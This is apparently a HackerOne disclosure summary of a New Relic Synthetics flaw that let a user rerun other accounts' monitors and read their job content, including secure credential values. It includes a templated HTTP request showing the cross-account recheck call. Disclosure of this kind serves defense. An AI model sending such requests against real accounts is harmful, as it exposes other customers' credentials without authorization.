New Relic: Ability to run monitors' jobs of other accounts and to read these jobs content (including the secure credentials values)

ID H1:787886
Type hackerone
Reporter skavans
Modified 2020-08-13T13:45:22


@skavans identified an endpoint for testing Synthetics monitors. Without proper validation, this could allow monitors from other accounts to run on your account with knowledge of the monitor's ID:

``` POST /accounts/<ACCOUNT ID>/monitors/monitor/recheck.json?monitorId=<MONITOR_ID> HTTP/1.1 Host: ...

{"monitorId":"<MONITOR_ID>","location":"AWS_AP_SOUTHEAST_1","accountId":<ACCOUNT ID>} ```